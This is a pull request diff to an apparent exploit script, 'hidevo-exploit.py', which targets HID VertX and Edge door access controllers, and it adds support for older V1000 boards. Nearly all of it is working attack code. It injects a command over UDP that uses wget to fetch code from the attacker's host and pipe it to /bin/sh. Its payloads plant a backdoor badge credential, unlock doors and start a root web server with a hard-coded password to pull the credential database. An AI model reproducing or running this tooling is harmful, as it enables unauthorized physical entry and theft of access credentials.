### PR TITLE
Tweaks for older V1000 boards

### DIFF
--- a/hid/hidevo-exploit.py
+++ b/hid/hidevo-exploit.py
@@ -69,13 +69,14 @@ def inject(rhost, rport):
     th.daemon = True
     th.start()
     # Checking device type for potential warnings
-    if rspn.split(";")[6] != "EH400" and rspn.split(";")[6] != "V2000":
-        if rspn.split(";")[6] == "V2-V1000":
+    boardtype = rspn.split(";")[6]
+    if boardtype != "EH400" and boardtype != "V2000":
+        if boardtype == "V2-V1000" or boardtype == "V1000":
             print "[!] Device appears to be a VertX V1000. This device has not been thoroughly tested."
             print "[!] This might not work..."
             print ""
         else:
-            print "[!] Unrecognized device type "+rspn.split(";")[6]+"."
+            print "[!] Unrecognized device type "+boardtype+"."
             print "[!] Assuming most common configuration."
             print "[!] Please submit any unrecognized device types to Concierge github repo issue tracker. https://github.com/lixmk/Concierge"
             print "[!] This might not work..."
@@ -84,8 +85,8 @@ def inject(rhost, rport):
     pkt1 = "command_blink_on;044;"+rmac+";1`wget http://"+local+":"+str(lport)+"/c -O-|/bin/sh`;"
     print "[*] Injecting command from: http://"+lhost+":"+str(lport)
     s.sendto(pkt1, (rhost, rport))
-    # Sleeping longer for V2000
-    if rspn.split(";")[6] == "V2000":
+    # Sleeping longer for V2000 and V1000
+    if boardtype == "V2000" or boardtype == "V1000":
         sleep(5)
     else:
         sleep(1)

--- a/hid/hidevo-exploit.py
+++ b/hid/hidevo-exploit.py
@@ -41,9 +41,11 @@ def discover(rhost, rport):
     # Setting global vars
     global rspn
     global rmac
+    global boardtype
     # Parsing discovery response
     rspn = s.recv(1024)
     rmac = rspn.split(";")[2]
+    boardtype = rspn.split(";")[6]
     print "[+] Response: "+rspn.split(";")[0]
     print "[+] Device Type: "+rspn.split(";")[6]
     print "[+] Hostname: "+rspn.split(";")[3]
@@ -114,13 +116,13 @@ if __name__ == '__main__':
         if args.cmd == 'implant':
             discover(rhost,rport)
             # Generating payloads
-            if rspn.split(";")[6] == "EH400":
+            if boardtype == "EH400":
                 with open("c","w+")as f:
                     f.write(r"echo -n -e \\x00\\x06\\x0a\\x73\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x00\\x00\\x0a\\x00 >> /mnt/apps/data/config/IdentDB; echo -n -e \\xff\\xff\\xff\\xff\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 >> /mnt/apps/data/config/AccessDB; /etc/init.d/access restart; /etc/init.d/ident restart")
-            elif rspn.split(";")[6] == "V2000":
+            elif boardtype == "V2000":
                 with open("c","w+")as f:
                     f.write(r"echo \\x00\\x06\\x77\\x73\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x00\\x00\\x77\\x00 | tr -d '\012' | tr '\167' '\012'>> /mnt/data/config/IdentDB; echo \\xff\\xff\\xff\\xff\\x0f\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 | tr -d \"\n\" >> /mnt/data/config/AccessDB; /etc/init.d/access restart; /etc/init.d/ident restart")
-            elif rspn.split(";")[6] == "V2-1000":
+            elif boardtype == "V2-1000":
                 with open("c","w+")as f:
                     f.write(r"echo -n -e \\x00\\x06\\x0a\\x73\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x00\\x00\\x0a\\x00 >> /mnt/apps/data/config/IdentDB; echo -n -e \\xff\\xff\\xff\\xff\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 >> /mnt/apps/data/config/AccessDB; /etc/init.d/access restart; /etc/init.d/ident restart")
             else:
@@ -139,13 +141,13 @@ if __name__ == '__main__':
         if args.cmd == 'unlock':
             discover(rhost,rport)
             # Generating payloads for different devices
-            if rspn.split(";")[6] == "EH400":
+            if boardtype == "EH400":
                 with open("c","w+")as f:
                     f.write('export QUERY_STRING="?ID=0&BoardType=V100&Description=Strike&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi')
-            elif rspn.split(";")[6] == "V2000":
+            elif boardtype == "V2000":
                 with open("c","w+")as f:
                     f.write('export QUERY_STRING="?ID=0&BoardType=V100&Description=Strike&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=Strike&Relay=2&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;')
-            elif rspn.split(";")[6] == "V2-V1000":
+            elif boardtype == "V2-V1000" or boardtype == "V1000":
                 with open("c","w+")as f:
                     f.write('export QUERY_STRING="?ID=1&BoardType=V100&Description=Strike&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi')
             else:
@@ -160,13 +162,13 @@ if __name__ == '__main__':
         if args.cmd == 'lock':
             discover(rhost,rport)
             # Generating payloads for different devices
-            if rspn.split(";")[6] == "EH400":
+            if boardtype == "EH400":
                 with open("c","w+")as f:
                     f.write('export QUERY_STRING="?ID=0&BoardType=V100&Description=Strike&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi')
-            elif rspn.split(";")[6] == "V2000":
+            elif boardtype == "V2000":
                 with open("c","w+")as f:
                     f.write('export QUERY_STRING="?ID=0&BoardType=V100&Description=Strike&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=Strike&Relay=2&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;')
-            elif rspn.split(";")[6] == "V2-V1000":
+            elif boardtype == "V2-V1000" or boardtype == "V1000":
                 with open("c","w+")as f:
                     f.write('export QUERY_STRING="?ID=1&BoardType=V100&Description=Strike&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi')
             else:
@@ -181,13 +183,13 @@ if __name__ == '__main__':
         if args.cmd == 'blink':
             discover(rhost,rport)
             # Generating payloads for different devices
-            if rspn.split(";")[6] == "EH400":
+            if boardtype == "EH400":
                 with open("c","w+")as f:
                     f.write('i="0"; while [ $i -lt 10 ]; do export QUERY_STRING="?ID=0&BoardType=V100&Description=LED_GREEN&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=LED_GREEN&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=LED_BLUE&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=LED_BLUE&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;i=`expr $i + 1`; done')
-            elif rspn.split(";")[6] == "V2000":
+            elif boardtype == "V2000":
                 with open("c","w+")as f:
                     f.write('i="0"; while [ $i -lt 10 ]; do export QUERY_STRING="?ID=0&BoardType=V100&Description=LED&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=LED&Relay=2&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=LED&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=0&BoardType=V100&Description=LED&Relay=2&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;i=`expr $i + 1`; done')
-            elif rspn.split(";")[6] == "V2-V1000":
+            elif boardtype == "V2-V1000" or boardtype == "V1000":
                 with open("c","w+")as f:
                     f.write('i="0"; while [ $i -lt 10 ]; do export QUERY_STRING="?ID=1&BoardType=V100&Description=LED&Relay=1&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=1&BoardType=V100&Description=LED&Relay=2&Action=1";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=1&BoardType=V100&Description=LED&Relay=1&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;export QUERY_STRING="?ID=1&BoardType=V100&Description=LED&Relay=2&Action=0";/mnt/apps/web/cgi-bin/diagnostics_execute.cgi;i=`expr $i + 1`; done')
             else:
@@ -202,13 +204,13 @@ if __name__ == '__main__':
         if args.cmd == 'exfil':
             discover(rhost,rport)
             # Generating payloads for different devices
-            if rspn.split(";")[6] == "EH400":
+            if boardtype == "EH400":
                 with open("c","w+")as f:
                     f.write('echo \'server.document-root = "/"\'> /tmp/cfg; echo \'server.port=8080\' >> /tmp/cfg; /usr/sbin/lighttpd -f /tmp/cfg; sleep 15; ps | grep /tmp/cfg | grep light | cut -d " " -f 2 | xargs kill; rm /tmp/cfg')
-            elif rspn.split(";")[6] == "V2000":
+            elif boardtype == "V2000":
                 with open("c","w+")as f:
                     f.write('echo \'WorkingRoot /\'> /tmp/boa.conf; echo \'Port 8080\'>> /tmp/boa.conf; echo \'User root\'>> /tmp/boa.conf; echo \'Group root\'>> /tmp/boa.conf; echo \'ErrorLog /dev/null\'>> /tmp/boa.conf; echo \'AccessLog /dev/null\'>> /tmp/boa.conf; echo \'UseLocaltime\'>> /tmp/boa.conf; echo \'DocumentRoot /mnt/data/config\'>> /tmp/boa.conf; echo \'UserDir /mnt/data/config\'>> /tmp/boa.conf; echo \'DirectoryIndex index.html\'>> /tmp/boa.conf; echo \'MimeTypes /etc/httpd/conf/mime.types\'>> /tmp/boa.conf; echo \'DefaultType text/plain\'>> /tmp/boa.conf; echo \'CGIPath /bin:/usr/bin:/mnt/apps/web/cgi-bin\'>> /tmp/boa.conf; echo \'ScriptAlias /axis-cgi/ /usr/html/axis-cgi/\'>> /tmp/boa.conf; echo \'ScriptAlias /admin-bin/ /usr/html/admin-bin/\'>> /tmp/boa.conf; echo \'ScriptAlias /cgi-bin/ /mnt/apps/web/cgi-bin/\'>> /tmp/boa.conf; echo \'PasswdFile /tmp/passwd\'>> /tmp/boa.conf; echo \'GroupFile /etc/group\'>> /tmp/boa.conf; echo \'root:password:0:0:Administrator:/:/bin/sh\' > /tmp/passwd; /bin/boa -c /tmp/; sleep 15; ps | grep \'/bin/boa -c /tmp/\' | grep -v grep | cut -d " " -f 1 | xargs kill; rm /tmp/boa.conf /tmp/passwd')
-            elif rspn.split(";")[6] == "V2-V1000":
+            elif boardtype == "V2-V1000" or boardtype == "V1000":
                 print "[!] This device appears to be a VertX V1000."
                 raise V1000
             else:
@@ -218,9 +220,9 @@ if __name__ == '__main__':
             inject(rhost,rport)
             remove("c")
             # Pulling IdentDB file
-            if rspn.split(";")[6] == "EH400":
+            if boardtype == "EH400":
                 idb = urllib2.urlopen("http://"+rhost+":8080/mnt/apps/data/config/IdentDB")
-            elif rspn.split(";")[6] == "V2-V1000" or rspn.split(";")[6] == "V2000":
+            elif boardtype == "V2-V1000" or boardtype == "V2000":
                 idb = urllib2.urlopen("http://"+rhost+":8080/IdentDB")
             else:
                 idb = urllib2.urlopen("http://"+rhost+":8080/IdentDB")


### PR DESCRIPTION
Experimentation with an older V1000 has shown mixed results. The board I was using had the version string "V1000" instead of "V2-V1000" so presumably it is an older version. It is super slow so the default 1 second timeout for command injection was not working, and this PR raises it to 5 seconds.

Additionally I refactored references to rspn for board type detection just to clean things up. Since there were a few instances where "V1000" boards may/may not work with the same payloads as "V2-V1000" I added it to some of the conditionals.

It appears that command injection is closer to working on boards like this, with these modifications. I don't have enough hardware hooked up to test exfil, lock, unlock, or implant (no readers currently) however the board does send a GET request to rhost as intended, so that's progress.

Tested hardware:
```
[+] Device Type: V1000
[+] Hostname: V1000_Floyd
[+] Internal IP: 10.98.75.77
[+] MAC Address: 00:06:8E:00:XX:XX
[+] Firmware Version: 2.2.7.49
[+] Build Date: 08/16/2010
```
